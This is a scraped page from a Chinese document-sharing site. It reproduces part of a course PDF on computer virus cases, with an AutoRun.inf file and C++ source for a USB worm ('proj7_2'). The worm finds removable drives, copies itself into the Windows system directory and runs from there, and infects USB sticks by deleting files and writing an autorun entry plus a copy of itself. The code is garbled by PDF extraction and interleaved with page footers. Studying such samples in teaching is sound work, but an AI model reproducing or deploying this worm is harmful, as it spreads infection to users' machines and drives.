2022年2022年计算机病毒案例 2.pdf
《2022年2022年计算机病毒案例 2.pdf》由会员分享,可在线阅读,更多相关《2022年2022年计算机病毒案例 2.pdf(5页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、一、U盘病毒AutoRun.inf 文件AutoRun open=proj7_2.exe shellopen=打开(&O) shellopenCommand=proj7_2.exe shellexplore=我的资源管理器 (&X) shellexploreCommand=proj7_2.exe proj7_2.cpp 案例名称: U 盘恶意代码程序名称: proj7_2.cpp #include stdafx.h bool SaveToFile(char* Path,char* Data) HANDLE hFile; hFile=CreateFile(Path, GENERIC_WRITE,
2、 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,NULL); if(hFile=INVALID_HANDLE_VALUE)/*continue; /出错时处理 */ DWORD dwWrite; WriteFile(hFile,Data,strlen(Data),&dwWrite,NULL); CloseHandle(hFile); return true; BOOL InfectU() while(true) UINT revtype; char name256=H: ; char szName256=0; char toPath256=0; c
3、har infPath256=0; char openU80=0; 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 1 页,共 5 页 - - - - - - - - - /遍历所有盘符for(BYTE i=0 x42;i0 x5B;i=i+0 x01) name0=i; /得到盘符类型revtype=GetDriveType(name); /判断是否是可移动存储设备if (revtype=DRIVE_REMOVABLE) /得到自身文件路径GetModuleFileName(NUL
4、L,szName,256); /比较是否和 U 盘的盘符相同/如果相同说明在 U 盘上执行,复制到系统中去if(strncmp(name,szName,1)=0) /得到系统目录GetSystemDirectory(toPath,256); strcat(toPath,proj7_2.exe); /把自身文件复制到系统目录if(CopyFile(szName,toPath,TRUE) /运行程序WinExec(toPath,0); strcpy(openU,explorer ); strcat(openU,name); /打开U 盘WinExec(openU,1); return 0; / 如
5、果不是在 U 盘上执行,则感染 U 盘else strcpy(toPath,name); strcat(toPath,proj7_2.exe); strcpy(infPath,name); strcat(infPath,AutoRun.inf); /还原U 盘上的文件属性SetFileAttributes(toPath,FILE_ATTRIBUTE_NORMAL); 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 2 页,共 5 页 - - - - - - - - - SetFile
6、Attributes(infPath,FILE_ATTRIBUTE_NORMAL); /删除原有文件DeleteFile(toPath); DeleteFile(infPath); /写AutoRun.inf 到U 盘char* Data; Data = AutoRunrnopen=proj7_2.exernshellopen= 打开(&O)rnshellexplore= 我的资源管理器(&X)rnshellexploreCommand=proj7_2.exe; SaveToFile(infPath,Data); /拷贝自身文件到 U 盘CopyFile(szName,toPath,FALSE
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 2022年2022年计算机病毒案例 2022 计算机病毒 案例
限制150内